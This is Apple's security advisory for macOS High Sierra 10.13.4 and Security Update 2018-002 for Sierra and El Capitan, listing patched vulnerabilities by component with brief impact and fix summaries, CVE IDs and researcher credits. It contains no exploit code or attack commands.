About the security content of macOS High Sierra 10.13.4, Security Update 2018-002 Sierra, and Security Update 2018-002 El Capitan

This document describes the security content of macOS High Sierra 10.13.4, Security Update 2018-002 Sierra, and Security Update 2018-002 El Capitan.

About Apple security updates

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security updates page.

For more information about security, see the Apple Product Security page. You can encrypt communications with Apple using the Apple Product Security PGP Key.

Apple security documents reference vulnerabilities by CVE-ID when possible.

macOS High Sierra 10.13.4, Security Update 2018-002 Sierra, and Security Update 2018-002 El Capitan

Admin Framework

Available for: macOS High Sierra 10.13.3

Impact: Passwords supplied to sysadminctl may be exposed to other local users

Description: The sysadminctl command-line tool required that passwords be passed to it in its arguments, potentially exposing the passwords to other local users. This update makes the password parameter optional, and sysadminctl will prompt for the password if needed.

CVE-2018-4170: an anonymous researcher

APFS

Available for: macOS High Sierra 10.13.3

Impact: An APFS volume password may be unexpectedly truncated

Description: An injection issue was addressed through improved input validation.

CVE-2018-4105: David J Beitey (@davidjb_), Geoffrey Bugniot

ATS

Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.3

Impact: Processing a maliciously crafted file might disclose user information

Description: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.

CVE-2018-4112: Haik Aftandilian of Mozilla

CFNetwork Session

Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6

Impact: An application may be able to gain elevated privileges

Description: A race condition was addressed with additional validation.

CVE-2018-4166: Samuel Groß (@5aelo)

CoreFoundation

Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.3

Impact: An application may be able to gain elevated privileges

Description: A race condition was addressed with additional validation.

CVE-2018-4155: Samuel Groß (@5aelo)

CVE-2018-4158: Samuel Groß (@5aelo)

CoreText

Available for: macOS High Sierra 10.13.3

Impact: Processing a maliciously crafted string may lead to a denial of service

Description: A denial of service issue was addressed with improved memory handling.

CVE-2018-4142: Robin Leroy of Google Switzerland GmbH

CoreTypes

Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6

Impact: Processing a maliciously crafted webpage may result in the mounting of a disk image

Description: A logic issue was addressed with improved restrictions.

CVE-2017-13890: Apple, Theodor Ragnar Gislason of Syndis

curl

Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6

Impact: Multiple issues in curl

Description: An integer overflow existed in curl. This issue was addressed with improved bounds checking.

CVE-2017-8816: Alex Nichols

Disk Images

Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.3

Impact: Mounting a malicious disk image may result in the launching of an application

Description: A logic issue was addressed with improved validation.

CVE-2018-4176: Theodor Ragnar Gislason of Syndis

Disk Management

Available for: macOS High Sierra 10.13.3

Impact: An APFS volume password may be unexpectedly truncated

Description: An injection issue was addressed through improved input validation.

CVE-2018-4108: Kamatham Chaitanya of ShiftLeft Inc., an anonymous researcher

EFI

Available for: macOS High Sierra 10.13.3

Impact: An attacker in Wi-Fi range may force nonce reuse in WPA clients (Key Reinstallation Attacks - KRACK)

Description: A logic issue existed in the handling of state transitions. This was addressed with improved state management.

CVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven

File System Events

Available for: macOS High Sierra 10.13.3

Impact: An application may be able to gain elevated privileges

Description: A race condition was addressed with additional validation.

CVE-2018-4167: Samuel Groß (@5aelo)

iCloud Drive

Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.3

Impact: An application may be able to gain elevated privileges

Description: A race condition was addressed with additional validation.

CVE-2018-4151: Samuel Groß (@5aelo)

Intel Graphics Driver

Available for: macOS High Sierra 10.13.3

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2018-4132: Axis and pjf of IceSword Lab of Qihoo 360

IOFireWireFamily

Available for: macOS High Sierra 10.13.3

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2018-4135: Xiaolong Bai and Min (Spark) Zheng of Alibaba Inc.

Kernel

Available for: macOS High Sierra 10.13.3

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2018-4150: an anonymous researcher

Kernel

Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.3

Impact: An application may be able to read restricted memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2018-4104: The UK's National Cyber Security Centre (NCSC)

Kernel

Available for: macOS High Sierra 10.13.3

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2018-4143: derrek (@derrekr6)

Kernel

Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.3

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds read was addressed through improved bounds checking.

CVE-2018-4136: Jonas Jensen of lgtm.com and Semmle

Kernel

Available for: macOS High Sierra 10.13.3

Impact: An application may be able to execute arbitrary code with system privileges

Description: An out-of-bounds read was addressed through improved bounds checking.

CVE-2018-4160: Jonas Jensen of lgtm.com and Semmle

Kernel

Available for: macOS High Sierra 10.13.3

Impact: A malicious application may be able to determine kernel memory layout

Description: An information disclosure issue existed in the transition of program state. This issue was addressed with improved state handling.

CVE-2018-4185: Brandon Azad

kext tools

Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.3

Impact: An application may be able to execute arbitrary code with system privileges

Description: A logic issue existed resulting in memory corruption. This was addressed with improved state management.

CVE-2018-4139: Ian Beer of Google Project Zero

LaunchServices

Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.3

Impact: A maliciously crafted application may be able to bypass code signing enforcement

Description: A logic issue was addressed with improved validation.

CVE-2018-4175: Theodor Ragnar Gislason of Syndis

libxml2

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.3, OS X El Capitan 10.11.6

Impact: Processing maliciously crafted web content may lead to an unexpected Safari crash

Description: A use after free issue was addressed with improved memory management.

CVE-2017-15412: Nick Wellnhofer

LinkPresentation

Available for: macOS High Sierra 10.13.3

Impact: Processing a maliciously crafted text message may lead to UI spoofing

Description: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.

CVE-2018-4187: Roman Mueller (@faker_), Zhiyang Zeng (@Wester) of Tencent Security Platform Department

Local Authentication

Available for: macOS High Sierra 10.13.3

Impact: A local user may be able to view senstive user information

Description: There was an issue with the handling of smartcard PINs. This issue was addressed with additional logic.

CVE-2018-4179: David Fuhrmann

Mail

Available for: macOS High Sierra 10.13.3

Impact: An attacker in a privileged network position may be able to exfiltrate the contents of S/MIME-encrypted e-mail

Description: An issue existed in the handling of S/MIME HTML e-mail. This issue was addressed by not loading remote resources on S/MIME encrypted messages by default if the message has an invalid or missing S/MIME signature.

CVE-2018-4111: Damian Poddebniak of Münster University of Applied Sciences, Christian Dresen of Münster University of Applied Sciences, Jens Müller of Ruhr University Bochum, Fabian Ising of Münster University of Applied Sciences, Sebastian Schinzel of Münster University of Applied Sciences, Simon Friedberger of KU Leuven, Juraj Somorovsky of Ruhr University Bochum, Jörg Schwenk of Ruhr University Bochum

Mail

Available for: macOS High Sierra 10.13.3

Impact: An attacker in a privileged network position may be able to intercept the contents of S/MIME-encrypted e-mail

Description: An inconsistent user interface issue was addressed with improved state management.

CVE-2018-4174: John McCombs of Integrated Mapping Ltd, McClain Looney of LoonSoft Inc.

Notes

Available for: macOS High Sierra 10.13.3

Impact: An application may be able to gain elevated privileges

Description: A race condition was addressed with additional validation.

CVE-2018-4152: Samuel Groß (@5aelo)

Notes

Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.3

Impact: An application may be able to gain elevated privileges

Description: A race condition was addressed with additional validation.

CVE-2017-7151: Samuel Groß (@5aelo)

NSURLSession

Available for: macOS High Sierra 10.13.3

Impact: An application may be able to gain elevated privileges

Description: A race condition was addressed with additional validation.

CVE-2018-4166: Samuel Groß (@5aelo)

NVIDIA Graphics Drivers

Available for: macOS High Sierra 10.13.3

Impact: An application may be able to read restricted memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2018-4138: Axis and pjf of IceSword Lab of Qihoo 360

PDFKit

Available for: macOS High Sierra 10.13.3

Impact: Clicking a URL in a PDF may visit a malicious website

Description: An issue existed in the parsing of URLs in PDFs. This issue was addressed through improved input validation.

CVE-2018-4107: Nick Safford of Innovia Technology

PluginKit

Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.3

Impact: An application may be able to gain elevated privileges

Description: A race condition was addressed with additional validation.

CVE-2018-4156: Samuel Groß (@5aelo)

Quick Look

Available for: macOS High Sierra 10.13.3

Impact: An application may be able to gain elevated privileges

Description: A race condition was addressed with additional validation.

CVE-2018-4157: Samuel Groß (@5aelo)

Remote Management

Available for: macOS High Sierra 10.13.3

Impact: A remote user may be able to gain root privileges

Description: A permissions issue existed in Remote Management. This issue was addressed through improved permission validation.

CVE-2018-4298: Tim van der Werff of SupCloud

Security

Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.3

Impact: A malicious application may be able to elevate privileges

Description: A buffer overflow was addressed with improved size validation.

CVE-2018-4144: Abraham Masri (@cheesecakeufo)

SIP

Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A configuration issue was addressed with additional restrictions.

CVE-2017-13911: Timothy Perfitt of Twocanoes Software

Status Bar

Available for: macOS High Sierra 10.13.3

Impact: A malicious application may be able to access the microphone without indication to the user

Description: A consistency issue existed in deciding when to show the microphone use indicator. The issue was resolved with improved capability validation.

CVE-2018-4173: Joshua Pokotilow of pingmd

Storage

Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.3

Impact: An application may be able to gain elevated privileges

Description: A race condition was addressed with additional validation.

CVE-2018-4154: Samuel Groß (@5aelo)

System Preferences

Available for: macOS High Sierra 10.13.3

Impact: A configuration profile may incorrectly remain in effect after removal

Description: An issue existed in CFPreferences. This issue was addressed with improved preferences cleanup.

CVE-2018-4115: Johann Thalakada, Vladimir Zubkov, and Matt Vlasach of Wandera

Terminal

Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.3

Impact: Pasting malicious content may lead to arbitrary command execution

Description: A command injection issue existed in the handling of Bracketed Paste Mode. This issue was addressed through improved validation of special characters.

CVE-2018-4106: Simon Hosie

WindowServer

Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.3

Impact: An unprivileged application may be able to log keystrokes entered into other applications even when secure input mode is enabled

Description: By scanning key states, an unprivileged application could log keystrokes entered into other applications even when secure input mode was enabled. This issue was addressed by improved state management.

CVE-2018-4131: Andreas Hegenberg of folivora.AI GmbH

Additional recognition

Mail

We would like to acknowledge Sabri Haddouche (@pwnsdx) from Wire Swiss GmbH for their assistance.

Safari Login AutoFill

We would like to acknowledge Jun Kokatsu (@shhnjk) for their assistance.

Security

We would like to acknowledge Abraham Masri (@cheesecakeufo) for their assistance.

Sharing Pref Pane

We would like to acknowledge an anonymous researcher for their assistance.